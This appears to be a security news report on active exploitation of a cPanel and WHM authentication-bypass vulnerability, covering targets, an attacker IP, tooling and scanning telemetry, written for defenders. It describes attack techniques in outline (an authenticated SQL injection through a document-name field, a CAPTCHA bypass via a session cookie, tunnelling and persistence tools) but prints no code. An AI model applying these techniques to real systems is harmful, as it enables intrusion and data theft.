"The script uses hard-coded credentials and defeats the portal's CAPTCHA by reading the expected CAPTCHA value out of the server-issued session cookie rather than solving the challenge normally," Ctrl-Alt-Intel said.
CVE-2026-41940: a critical cPanel and WHM authentication bypass
On May 2, 2026, Ctrl-Alt-Intel reported active exploitation of CVE-2026-41940, a critical vulnerability in cPanel and WebHost Manager (WHM) that can produce an authentication bypass and allow remote attackers to gain elevated control of the control panel. Attackers have been observed using publicly available proof-of-concepts (PoCs) to weaponize the flaw against internet-facing control panels.
Targeting pattern: governments, militaries, MSPs and hosting providers — and an originating IP
The activity tracked by Ctrl-Alt-Intel originated from the IP address 95.111.250[.]175 and primarily singled out government and military domains associated with the Philippines (*.mil.ph and (*.ph)) and Laos (*.gov.la). A smaller cluster of targets included managed service providers and hosting providers in the Philippines, Laos, Canada, South Africa, and the U.S. The reporting ties these intrusions directly to exploitation attempts of the cPanel vulnerability using publicly-available PoCs.
Prior custom exploit chain against an Indonesian defense training portal
Separately, Ctrl-Alt-Intel describes a prior, bespoke intrusion against an Indonesian defense-sector training portal. In that incident the actor reportedly already possessed valid credentials for the portal and combined an authenticated SQL injection with remote code execution to gain access. The group bypassed the portal's CAPTCHA by reading the expected CAPTCHA value from a server-issued session cookie rather than attempting to solve the challenge.
Once authenticated, the actor moved to a document-management function. Ctrl-Alt-Intel said the vulnerable parameter was the field used to save a document name; the script injected SQL into that field when posting to the document-save endpoint.
Tools and persistence: AdapdixC2, OpenVPN, Ligolo and systemd
Analysis of compromised hosts shows the threat actor employing the AdapdixC2 command-and-control framework to control endpoints remotely. The actor also used tools such as OpenVPN and Ligolo to maintain network-level access.
"The actor built a durable access layer using OpenVPN, Ligolo, systemd persistence, and then used that access to pivot into an internal network and exfiltrate a substantial corpus of Chinese railway-sector documents," Ctrl-Alt-Intel added, describing both the persistence mechanisms and the apparent intel-gathering outcome of at least one intrusion.
Rapid, wide weaponization: Censys and Shadowserver telemetry
Ctrl-Alt-Intel's findings sit alongside broader telemetry indicating near-immediate exploitation following disclosure. Censys reported evidence that the cPanel vulnerability was being weaponized by multiple third parties within 24 hours of public disclosure, including deployments of Mirai botnet variants and a ransomware strain called Sorry.
Shadowserver Foundation data shows the scale of scanning and brute-force activity tied to CVE-2026-41940: at least 44,000 IP addresses likely compromised via the vulnerability engaged with Shadowserver's honeypots on April 30, 2026. That number fell to 3,540 by May 3, 2026, according to Shadowserver's counts.
What this means for technologists, policymakers, and MSPs
- Technologists and security teams: will need to monitor for indicators described by Ctrl-Alt-Intel — reuse of publicly-available PoCs against cPanel/WHM, the presence of AdapdixC2, and lateral-access tooling such as OpenVPN and Ligolo — and to investigate unusual document-management activity that could indicate SQL injection or exfiltration.
- Policymakers and government IT owners: are confronted with targeted exploitation against government and military domains in the Philippines and Laos, and a documented intrusion that resulted in exfiltration of Chinese railway-sector documents; those specifics may shape incident response and cross-border reporting priorities.
- MSPs and hosting providers: were explicitly listed among targets in the Philippines, Laos, Canada, South Africa, and the U.S., and must account for the observed post-compromise behaviors — scanning, brute-force activity, and the deployment of Mirai and ransomware strains reported by Censys and Shadowserver.
The record assembled by Ctrl-Alt-Intel, Censys, and Shadowserver sketches a campaign that moved quickly from PoCs to varied operational activity: targeted espionage against a defense-sector portal, broad scanning and brute-force waves tied to tens of thousands of likely compromised IPs, and the use of persistent network access tools and a commercial-looking C2 framework. Who stands behind these operations remains unspecified in the reporting; what is clear is the speed and diversity of exploitation enabled by CVE-2026-41940.
